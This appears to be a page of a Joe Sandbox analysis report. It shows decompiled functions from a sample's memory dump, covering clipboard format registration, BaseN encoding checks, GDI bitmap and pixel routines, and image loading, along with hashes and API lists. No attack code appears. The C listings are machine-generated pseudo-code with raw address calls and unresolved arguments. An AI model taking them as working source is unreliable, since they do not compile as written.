Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: 4a984f9cc9268b2f051bc072599f924a9f238adb75fa9801720ec6f2a6b6d909
Instruction ID: 7206b462c92a245475575897137bf278bd2ab86c294f2dd128995c73b3b6d44f
Opcode Fuzzy Hash: 4a984f9cc9268b2f051bc072599f924a9f238adb75fa9801720ec6f2a6b6d909
Instruction Fuzzy Hash: E5B092B0853118BEDE00A734AA0D7963554EB41306F148895E006A2002EE3985A9CAA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CA1C0F Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 46registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatW.USER32(Native), ref: 00E20BD5
RegisterClipboardFormatW.USER32(OwnerLink), ref: 00E20BDE
RegisterClipboardFormatW.USER32(ObjectLink), ref: 00E20BE8
RegisterClipboardFormatW.USER32(Embedded Object), ref: 00E20BF2
RegisterClipboardFormatW.USER32(Embed Source), ref: 00E20BFC
RegisterClipboardFormatW.USER32(Link Source), ref: 00E20C06
RegisterClipboardFormatW.USER32(Object Descriptor), ref: 00E20C10
RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 00E20C1A
RegisterClipboardFormatW.USER32(FileName), ref: 00E20C24
RegisterClipboardFormatW.USER32(FileNameW), ref: 00E20C2E
RegisterClipboardFormatW.USER32(Rich Text Format), ref: 00E20C38
RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 00E20C42

Strings

Link Source, xrefs: 00E20BFE
OwnerLink, xrefs: 00E20BD7
Rich Text Format, xrefs: 00E20C30
Object Descriptor, xrefs: 00E20C08
FileNameW, xrefs: 00E20C26
FileName, xrefs: 00E20C1C
Link Source Descriptor, xrefs: 00E20C12
Embed Source, xrefs: 00E20BF4
Native, xrefs: 00E20BCE
RichEdit Text and Objects, xrefs: 00E20C3A
Embedded Object, xrefs: 00E20BEA
ObjectLink, xrefs: 00E20BE0

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: e030a10dd0c2fc79c0a72f8a21ce050db23ff9003b9327468b3911f3f5bba5e3
Instruction ID: e467d9db2e5e70d0d5485b43d89848c267f76888fb359c8eacce7f830d17751d
Opcode Fuzzy Hash: e030a10dd0c2fc79c0a72f8a21ce050db23ff9003b9327468b3911f3f5bba5e3
Instruction Fuzzy Hash: 52014471E487297ECB109F779E0DD4A7EA0FE45760300696FA058A7640DBB6D852CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DDD2 Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 236COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4DDD9

Part of subcall function 00E4DBE9: __EH_prolog3_GS.LIBCMT ref: 00E4DBF3
Part of subcall function 00E4DBE9: __CxxThrowException@8.LIBCMT ref: 00E4DC74

Part of subcall function 00E4C6B1: __EH_prolog3_GS.LIBCMT ref: 00E4C6BB
Part of subcall function 00E4C6B1: __CxxThrowException@8.LIBCMT ref: 00E4C73C

__CxxThrowException@8.LIBCMT ref: 00E4DE93
__EH_prolog3_GS.LIBCMT ref: 00E4DEA0
__CxxThrowException@8.LIBCMT ref: 00E4DF7D
__EH_prolog3.LIBCMT ref: 00E4DF8A

Strings

BaseN_Decoder: Log2Base must be between 1 and 7 inclusive, xrefs: 00E4DE64
BaseN_Encoder: Log2Base must be between 1 and 7 inclusive, xrefs: 00E4DF4E
Log2Base, xrefs: 00E4DDFE, 00E4DEC5
GroupSize, xrefs: 00E4DF9D
EncodingLookupArray, xrefs: 00E4DEAE
PaddingByte, xrefs: 00E4DEE9
BaseN_Decoder, xrefs: 00E4DDEC, 00E4DE03
Separator, xrefs: 00E4DFDC, 00E4DFF8
Grouper, xrefs: 00E4DFE1
Pad, xrefs: 00E4DEF9
BaseN_Encoder, xrefs: 00E4DEB3, 00E4DECA
DecodingLookupArray, xrefs: 00E4DDE7
Terminator, xrefs: 00E4E00D

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3_Throw$H_prolog3
String ID: BaseN_Decoder$BaseN_Decoder: Log2Base must be between 1 and 7 inclusive$BaseN_Encoder$BaseN_Encoder: Log2Base must be between 1 and 7 inclusive$DecodingLookupArray$EncodingLookupArray$GroupSize$Grouper$Log2Base$Pad$PaddingByte$Separator$Terminator
API String ID: 2346160487-2095131268
Opcode ID: c8b650f05ac38a6482a94028e02a98eef203053c601367c58b70a9c7bb7bb2a2
Instruction ID: a5d300afa25b8161f28fff1d541e4bdb2313ac5711a3682547fb7c791d830bae
Opcode Fuzzy Hash: c8b650f05ac38a6482a94028e02a98eef203053c601367c58b70a9c7bb7bb2a2
Instruction Fuzzy Hash: D081D071A40205ABCF18EBA0DC52AEDB7F5FFA4315F14614DF5157B281DBB0AA09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00D3705D Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 273
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00D3705D(intOrPtr __ecx, void* __edx, signed long long __fp0) {
				int _t141;
				void* _t144;
				short _t150;
				void* _t155;
				void* _t156;
				intOrPtr _t159;
				void* _t164;
				void* _t174;
				void* _t182;
				unsigned int _t184;
				void* _t199;
				intOrPtr _t201;
				int _t202;
				unsigned int _t204;
				signed int _t214;
				intOrPtr _t217;
				int _t231;
				signed int _t233;
				signed char* _t241;
				void* _t242;
				signed int _t244;
				void* _t245;
				signed long long* _t246;
				signed long long _t249;
				signed long long _t252;

				_t249 = __fp0;
				_t232 = __edx;
				0xe21503(0x104);
				_t201 = __ecx;
				 *((intOrPtr*)(_t245 - 0xc8)) = __ecx;
				 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(_t245 + 8));
				 *((intOrPtr*)(__ecx + 0x30)) = 1;
				if( *((intOrPtr*)(__ecx + 0x8c)) != 0) {
					if( *((intOrPtr*)(E00D20FF2() + 0x1ac)) > 8) {
						E00D19EF3(_t245 - 0xc4);
						 *(_t245 - 4) =  *(_t245 - 4) & 0x00000000;
						E00D1A8A4(_t201, _t245 - 0xc4, __edx, CreateCompatibleDC(0));
						if(GetObjectW( *(_t201 + 0x8c), 0x18, _t245 - 0x110) == 0) {
							L30:
							_t202 = 0;
						} else {
							 *(_t245 - 0xb0) =  *(_t245 - 0x10c);
							 *(_t245 - 0x94) =  *(_t245 - 0x108);
							_t144 =  *(_t201 + 0x8c);
							if(_t144 == 0) {
								_t242 = 0;
								 *(_t245 - 0x98) = 0;
							} else {
								_t199 = SelectObject( *(_t245 - 0xc0), _t144);
								_t242 = _t199;
								 *(_t245 - 0x98) = _t199;
							}
							if(_t242 == 0) {
								goto L30;
							} else {
								E00D19EF3(_t245 - 0xd8);
								 *(_t245 - 4) = 1;
								E00D1A8A4(_t201, _t245 - 0xd8, _t232, CreateCompatibleDC( *(_t245 - 0xc0)));
								_t233 =  *(_t245 - 0x94);
								_t214 =  *(_t245 - 0xb0);
								 *(_t245 - 0x2c) =  *(_t245 - 0x2c) & 0x00000000;
								 *((short*)(_t245 - 0x30)) = 1;
								_t150 = 0x20;
								 *((short*)(_t245 - 0x2e)) = _t150;
								 *(_t245 - 0x38) = _t214;
								 *(_t245 - 0x3c) = 0x28;
								 *(_t245 - 0x28) = _t233 * _t214;
								 *(_t245 - 0x34) = _t233;
								 *((intOrPtr*)(_t245 - 0x24)) = 0;
								 *((intOrPtr*)(_t245 - 0x20)) = 0;
								 *((intOrPtr*)(_t245 - 0x1c)) = 0;
								 *((intOrPtr*)(_t245 - 0x18)) = 0;
								 *(_t245 - 0xe0) = 0;
								_t155 = CreateDIBSection( *(_t245 - 0xd4), _t245 - 0x3c, 0, _t245 - 0xe0, 0, 0);
								 *(_t245 - 0x9c) = _t155;
								if(_t155 != 0) {
									_t156 = SelectObject( *(_t245 - 0xd4), _t155);
									 *(_t245 - 0xdc) = _t156;
									if(_t156 != 0) {
										BitBlt( *(_t245 - 0xd4), 0, 0,  *(_t245 - 0xb0),  *(_t245 - 0x94),  *(_t245 - 0xc0), 0, 0, 0xcc0020);
										_t159 =  *((intOrPtr*)(_t201 + 0xc));
										 *((intOrPtr*)(_t245 - 0xa0)) = _t159;
										if(_t159 <= 0) {
											_t159 = 0x82;
											 *((intOrPtr*)(_t245 - 0xa0)) = 0x82;
										}
										 *((intOrPtr*)(_t245 - 0xa8)) = _t159;
										if( *((intOrPtr*)(_t201 + 8)) != 0x20) {
											E00D41EEE(_t245 - 0xac, _t245 - 0xd8);
											_t217 =  *((intOrPtr*)(_t201 + 0xa8));
											 *(_t245 - 4) = 2;
											if(_t217 == 0xffffffff) {
												_t217 =  *((intOrPtr*)(E00D20FF2() + 0x1c));
											}
											 *(_t245 - 0xf0) =  *(_t245 - 0xf0) & 0x00000000;
											 *(_t245 - 0xec) =  *(_t245 - 0xec) & 0x00000000;
											_push(0xffffffff);
											_push(_t217);
											_push( *((intOrPtr*)(_t245 - 0xa0)));
											 *(_t245 - 0xe8) =  *(_t245 - 0xb0);
											 *(_t245 - 0xe4) =  *(_t245 - 0x94);
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											_t164 = L00D44708(_t245 - 0xac, _t233, _t249);
											 *(_t245 - 4) = 1;
											E00D41F03(_t164, _t245 - 0xac);
											goto L27;
										} else {
											if(GetObjectW( *(_t245 - 0x9c), 0x54, _t245 - 0x90) == 0) {
												goto L11;
											} else {
												_t174 = 0x20;
												if( *((intOrPtr*)(_t245 - 0x7e)) != _t174 ||  *((intOrPtr*)(_t245 - 0x7c)) == 0) {
													goto L11;
												} else {
													 *(_t245 - 0x94) =  *(_t245 - 0x94) & 0x00000000;
													if( *(_t245 - 0x88) *  *(_t245 - 0x8c) > 0) {
														asm("fild dword [ebp-0xa8]");
														 *(_t245 - 0xa4) = _t249;
														_t251 =  *(_t245 - 0xa4) *  *0xea5418;
														_t241 =  *((intOrPtr*)(_t245 - 0x7c)) + 1;
														 *(_t245 - 0xa4) =  *(_t245 - 0xa4) *  *0xea5418;
														do {
															_t182 = L00D45A47((( *(_t241 - 1) & 0x000000ff) << 0x00000008 |  *_t241 & 0x000000ff) << 0x00000008 | _t241[1] & 0x000000ff, _t251, (( *(_t241 - 1) & 0x000000ff) << 0x00000008 |  *_t241 & 0x000000ff) << 0x00000008 | _t241[1] & 0x000000ff, _t245 - 0xf8, _t245 - 0xe8, _t245 - 0xb4);
															_t252 =  *(_t245 - 0xa4);
															_t246 = _t246 - 0x30;
															asm("fst qword [esp+0x28]");
															asm("fst qword [esp+0x20]");
															_t246[3] = _t252;
															asm("fldz");
															_t246[2] = _t252;
															_t246[1] =  *(_t245 - 0xb4);
															_t251 =  *(_t245 - 0xf8);
															 *_t246 =  *(_t245 - 0xf8);
															_push(E00D44A1F(_t182));
															_t184 = E00D45749((( *(_t241 - 1) & 0x000000ff) << 0x00000008 |  *_t241 & 0x000000ff) << 0x00000008 | _t241[1] & 0x000000ff);
															_t244 = _t241[2] & 0x000000ff;
															_t204 = _t184;
															asm("cdq");
															_t241[1] = (_t204 & 0x000000ff) * _t244 / 0xff;
															asm("cdq");
															 *_t241 = (_t204 >> 0x00000008 & 0x000000ff) * _t244 / 0xff;
															_t241 =  &(_t241[4]);
															asm("cdq");
															 *((char*)(_t241 - 5)) = (_t204 >> 0x00000010 & 0x000000ff) * _t244 / 0xff;
															_t231 =  *(_t245 - 0x94) + 1;
															 *(_t245 - 0x94) = _t231;
														} while (_t231 <  *(_t245 - 0x88) *  *(_t245 - 0x8c));
														_t201 =  *((intOrPtr*)(_t245 - 0xc8));
														L27:
														_t242 =  *(_t245 - 0x98);
													}
													SelectObject( *(_t245 - 0xd4),  *(_t245 - 0xdc));
													SelectObject( *(_t245 - 0xc0), _t242);
													DeleteObject( *(_t201 + 0x8c));
													 *(_t201 + 0x8c) =  *(_t245 - 0x9c);
													_t202 = 1;
												}
											}
										}
									} else {
										SelectObject( *(_t245 - 0xc0), _t242);
										DeleteObject( *(_t245 - 0x9c));
										goto L11;
									}
								} else {
									SelectObject( *(_t245 - 0xc0), _t242);
									L11:
									_t202 = 0;
								}
								 *(_t245 - 4) = 0;
								E00D1A049(_t245 - 0xd8);
							}
						}
						 *(_t245 - 4) =  *(_t245 - 4) | 0xffffffff;
						E00D1A049(_t245 - 0xc4);
						_t141 = _t202;
					} else {
						_t141 = 1;
					}
				} else {
					_t141 = 1;
				}
				0xe214b2();
				return _t141;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00D37067

Strings

(, xrefs: 00D37182

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3_
String ID: (
API String ID: 2427045233-3887548279
Opcode ID: 02633a3505c02130b97608c752f2cd2f64bd1146210786fab60090ed8a83a8d5
Instruction ID: 1135b5768c8d06235c3bea141e6069effec25480ac8af4a318fe9a76fb290618
Opcode Fuzzy Hash: 02633a3505c02130b97608c752f2cd2f64bd1146210786fab60090ed8a83a8d5
Instruction Fuzzy Hash: 63C13B71904629DFDB24DF64DC85BAABBB4FF05300F0081EAE549A6252DB305E94CF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D37C66 Relevance: 24.2, APIs: 16, Instructions: 160
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00D37C66(void* __ebx, void* __edx, void* __fp0) {
				int _t63;
				int _t66;
				int _t67;
				void* _t68;
				void* _t72;
				int _t75;
				long _t81;
				void* _t82;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t90;
				int _t92;
				int _t96;
				void* _t100;
				void* _t101;
				void** _t102;
				int _t103;
				int _t105;
				void* _t107;
				void* _t109;

				_t109 = __fp0;
				_t101 = __edx;
				_t88 = __ebx;
				0xe214d0(0x50);
				_t102 =  *(_t107 + 8);
				if( *_t102 != 0) {
					if( *((intOrPtr*)(_t107 + 0x10)) == 0xffffffff ||  *((intOrPtr*)(_t107 + 0x14)) != 0xffffffff) {
						E00D19EF3(_t107 - 0x34);
						 *(_t107 - 4) =  *(_t107 - 4) & 0x00000000;
						E00D1A8A4(_t88, _t107 - 0x34, _t101, CreateCompatibleDC(0));
						_push(_t107 - 0x5c);
						_t63 = 0x18;
						if(GetObjectW( *_t102, _t63, ??) == 0) {
							L11:
							_t89 = 0;
							L12:
							 *(_t107 - 4) =  *(_t107 - 4) | 0xffffffff;
							E00D1A049(_t107 - 0x34);
							_t66 = _t89;
							L13:
							0xe2149e();
							return _t66;
						}
						if( *_t102 == 0) {
							_t90 = 0;
							 *(_t107 - 0x1c) = 0;
						} else {
							_t87 = SelectObject( *(_t107 - 0x30),  *_t102);
							_t90 = _t87;
							 *(_t107 - 0x1c) = _t87;
						}
						if(_t90 != 0) {
							_t96 =  *(_t107 - 0x54);
							_t67 =  *(_t107 - 0x58);
							 *(_t107 - 0x10) = _t67;
							 *(_t107 - 0x18) = _t96;
							_t68 = CreateCompatibleBitmap( *(_t107 - 0x30), _t67, _t96);
							 *(_t107 - 0x14) = _t68;
							if(_t68 != 0) {
								E00D19EF3(_t107 - 0x44);
								 *(_t107 - 4) = 1;
								E00D1A8A4(_t90, _t107 - 0x44, _t101, CreateCompatibleDC( *(_t107 - 0x30)));
								_t72 = SelectObject( *(_t107 - 0x40),  *(_t107 - 0x14));
								 *(_t107 - 0x24) = _t72;
								if(_t72 != 0) {
									BitBlt( *(_t107 - 0x40), 0, 0,  *(_t107 - 0x10),  *(_t107 - 0x18),  *(_t107 - 0x30), 0, 0, 0xcc0020);
									 *(_t107 - 0x20) =  *(_t107 - 0x20) & 0x00000000;
									_t75 =  *(_t107 - 0x10);
									if(_t75 <= 0) {
										L33:
										SelectObject( *(_t107 - 0x40),  *(_t107 - 0x24));
										SelectObject( *(_t107 - 0x30), _t90);
										DeleteObject( *_t102);
										 *_t102 =  *(_t107 - 0x14);
										_t89 = 1;
										L34:
										 *(_t107 - 4) = 0;
										E00D1A049(_t107 - 0x44);
										goto L12;
									}
									_t105 =  *(_t107 - 0x20);
									_t92 =  *(_t107 - 0x18);
									do {
										_t103 = 0;
										if(_t92 <= 0) {
											goto L31;
										} else {
											goto L19;
										}
										do {
											L19:
											_t81 = GetPixel( *(_t107 - 0x40), _t105, _t103);
											 *(_t107 - 0x20) = _t81;
											if( *((intOrPtr*)(_t107 + 0x10)) == 0xffffffff) {
												_t100 = 0x18;
												if( *((intOrPtr*)(_t107 - 0x4a)) != _t100 ||  *0xf01a40 != 0) {
													_t82 = E00D37EC8(_t103, _t105, _t81,  *((intOrPtr*)(_t107 + 0xc)));
												} else {
													_t82 = E00D37F58(_t109, _t81);
												}
												if( *(_t107 - 0x20) == _t82) {
													goto L29;
												}
												_push(_t82);
												L28:
												SetPixel( *(_t107 - 0x40), _t105, _t103, ??);
												goto L29;
											}
											if(_t81 !=  *((intOrPtr*)(_t107 + 0x10))) {
												goto L29;
											}
											_push( *((intOrPtr*)(_t107 + 0x14)));
											goto L28;
											L29:
											_t103 = _t103 + 1;
										} while (_t103 < _t92);
										_t75 =  *(_t107 - 0x10);
										L31:
										_t105 = _t105 + 1;
									} while (_t105 < _t75);
									_t102 =  *(_t107 + 8);
									_t90 =  *(_t107 - 0x1c);
									goto L33;
								}
								SelectObject( *(_t107 - 0x30), _t90);
								DeleteObject( *(_t107 - 0x14));
								_t89 = 0;
								goto L34;
							}
							SelectObject( *(_t107 - 0x30), _t90);
						}
						goto L11;
					} else {
						goto L1;
					}
				}
				L1:
				_t66 = 0;
				goto L13;
			}

APIs

__EH_prolog3.LIBCMT ref: 00D37C6D
CreateCompatibleDC.GDI32(00000000), ref: 00D37C9B
GetObjectW.GDI32(?,00000018,?,00000000), ref: 00D37CB4
SelectObject.GDI32(?,?), ref: 00D37CCE
CreateCompatibleBitmap.GDI32(?,0000000F,00000010), ref: 00D37CF1
SelectObject.GDI32(?,00000000), ref: 00D37D02
CreateCompatibleDC.GDI32(?), ref: 00D37D2B
SelectObject.GDI32(?,00000000), ref: 00D37D40
SelectObject.GDI32(?,00000000), ref: 00D37D4D
DeleteObject.GDI32(00000000), ref: 00D37D52
BitBlt.GDI32(?,00000000,00000000,000000FF,?,?,00000000,00000000,00CC0020), ref: 00D37D76
GetPixel.GDI32(?,00000000,00000000), ref: 00D37D98
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 00D37DDF
SelectObject.GDI32(?,00EA53B8), ref: 00D37E04
SelectObject.GDI32(?,00000000), ref: 00D37E0A
DeleteObject.GDI32(?), ref: 00D37E0E

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
String ID:
API String ID: 3639146769-0
Opcode ID: 8d26c5d5bc50a8def3c338d06eda9fa56b8780c98be6d92864ea82edf53af4b4
Instruction ID: f1d54cff7a6258d493c403323a75f1e281e1d23bcc264e6dcb86c2498437d8c3
Opcode Fuzzy Hash: 8d26c5d5bc50a8def3c338d06eda9fa56b8780c98be6d92864ea82edf53af4b4
Instruction Fuzzy Hash: CB5143B190461AEFDF219FA4EC89AAEBBB5FF08310F140129F515B22A0DB718D55DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA1C3 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 370COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CAA288
_memmove.LIBCMT ref: 00CAA2BA
_memmove.LIBCMT ref: 00CAA2EF
_memmove.LIBCMT ref: 00CAA377
_memmove.LIBCMT ref: 00CAA3EE
_memmove.LIBCMT ref: 00CAA459
_memmove.LIBCMT ref: 00CAA49D
_memmove.LIBCMT ref: 00CAA4DA
std::_Xinvalid_argument.LIBCPMT ref: 00CAA507

Strings

string too long, xrefs: 00CAA502
invalid string position, xrefs: 00CAA50C

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 5ea6d6a0e20f28cd2a00188482f10a7b39a918e0c5d43de05455f7f96eaa4edc
Instruction ID: 35eb66595936d71005ee4e9e8566b2b050878e10d51cb206d0552b8de9edd842
Opcode Fuzzy Hash: 5ea6d6a0e20f28cd2a00188482f10a7b39a918e0c5d43de05455f7f96eaa4edc
Instruction Fuzzy Hash: D4D15971A0170AEFCF20CF49D88199AB7F5FF89708B248929F94587201D771EE51CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00D3768E Relevance: 18.2, APIs: 12, Instructions: 196
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00D3768E(void* __ecx, void* __edx, void* __fp0) {
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t60;
				signed short _t66;
				void* _t76;
				long _t77;
				void** _t98;
				signed int _t107;
				void* _t115;
				void* _t116;
				WCHAR* _t117;
				WCHAR* _t118;
				void* _t121;
				signed int* _t122;
				signed int* _t123;
				void* _t125;
				void* _t140;

				_t140 = __fp0;
				_t115 = __edx;
				0xe21503(0xa38);
				_t116 = __ecx;
				_t117 =  *(_t125 + 8);
				_t53 = 0;
				if( *((intOrPtr*)(__ecx + 0x28)) == 0) {
					if((0 | _t117 != 0x00000000) == 0) {
						E00D0BD09(__ecx);
					}
					_t98 = _t116 + 0x8c;
					E00D10DEA(_t98);
					_push(_t117);
					E00CA3713(_t98, _t125 - 0xa2c, _t116);
					 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
					if(E00D18A08(_t125 - 0xa2c, "\\", 0) == 0xffffffff && E00D18A08(_t125 - 0xa2c, 0xe943ac, 0) == 0xffffffff && E00D18A08(_t125 - 0xa2c, 0xe9e2a4, 0) == 0xffffffff && GetModuleFileNameW(0, _t125 - 0xa28, 0x104) != 0) {
						0xe2728b(_t125 - 0xa28, _t125 - 0x18, 3, _t125 - 0x618, 0x100, 0, 0, 0, 0);
						0xe2728b(_t117, 0, 0, 0, 0, _t125 - 0x418, 0x100, _t125 - 0x218, 0x100);
						0xe2a208(_t125 - 0x820, 0x104, _t125 - 0x18, _t125 - 0x618, _t125 - 0x418, _t125 - 0x218);
						E00CA66C9(_t98, _t125 - 0xa2c, _t116, _t125 - 0x820);
					}
					if( *((intOrPtr*)(_t125 + 0xc)) <= 0) {
						L12:
						 *(_t125 - 0x18) = 0x2010;
						if( *((intOrPtr*)(_t116 + 0x34)) != 0) {
							 *(_t125 - 0x18) = 0x3010;
						}
						_t118 =  *(_t125 - 0xa2c);
						_t60 = LoadImageW( *(E00D0D804(_t98, _t118) + 8), _t118, 0, 0, 0,  *(_t125 - 0x18));
						 *_t98 = _t60;
						if(_t60 == 0) {
							goto L11;
						} else {
							if(GetObjectW(_t60, 0x18, _t125 - 0xa44) != 0) {
								 *((intOrPtr*)(_t116 + 0x18)) = 1;
								E00CAC13D(_t116 + 0x98, 1, _t125 - 0xa2c);
								if((GetFileAttributesW( *(_t125 - 0xa2c)) & 0x00000001) != 0) {
									 *((intOrPtr*)(_t116 + 0x24)) = 1;
								}
								_t66 =  *((intOrPtr*)(_t125 - 0xa32));
								_t107 = _t66 & 0x0000ffff;
								 *(_t116 + 8) = _t107;
								_t121 = 0x20;
								if(_t107 > 8 && _t107 < _t121) {
									E00D37C66(_t98, _t115, _t140, _t98, 0, 0xffffffff, 0xffffffff);
									_t66 =  *((intOrPtr*)(_t125 - 0xa32));
								}
								if(_t66 >= _t121) {
									E00D387DD( *_t98,  *((intOrPtr*)(_t116 + 0x3c)));
								}
								E00D395F6(_t116);
								_t122 = _t116 + 0x90;
								E00D10DEA(_t122);
								 *_t122 =  *_t122 & 0x00000000;
								_t123 = _t116 + 0x94;
								E00D10DEA(_t123);
								 *_t123 =  *_t123 & 0x00000000;
								E00CA656C( &(( *(_t125 - 0xa2c))[0xfffffffffffffff8]), _t115);
								_t53 = 1;
							} else {
								DeleteObject( *_t98);
								 *_t98 =  *_t98 & 0x00000000;
								goto L11;
							}
						}
					} else {
						_t76 = CreateFileW(_t117, 0x80000000, 1, 0, 3, 0, 0);
						 *(_t125 - 0x18) = _t76;
						if(_t76 == 0xffffffff) {
							goto L12;
						} else {
							_t77 = GetFileSize(_t76, 0);
							CloseHandle( *(_t125 - 0x18));
							if(_t77 <=  *((intOrPtr*)(_t125 + 0xc))) {
								goto L12;
							} else {
								L11:
								E00CA656C( *(_t125 - 0xa2c) - 0x10, _t115);
								_t53 = 0;
							}
						}
					}
				}
				0xe214b2();
				return _t53;
			}

0x00d3768e
0x00d3768e
0x00d37698
0x00d3769d
0x00d3769f
0x00d376a2
0x00d376a7
0x00d376b4
0x00d376b6
0x00d376b6
0x00d376bb
0x00d376c2
0x00d376c7
0x00d376ce
0x00d376d3
0x00d376ec
0x00d37763
0x00d37784
0x00d377b1
0x00d377c6
0x00d377c6
0x00d377cf
0x00d3781c
0x00d37820
0x00d37827
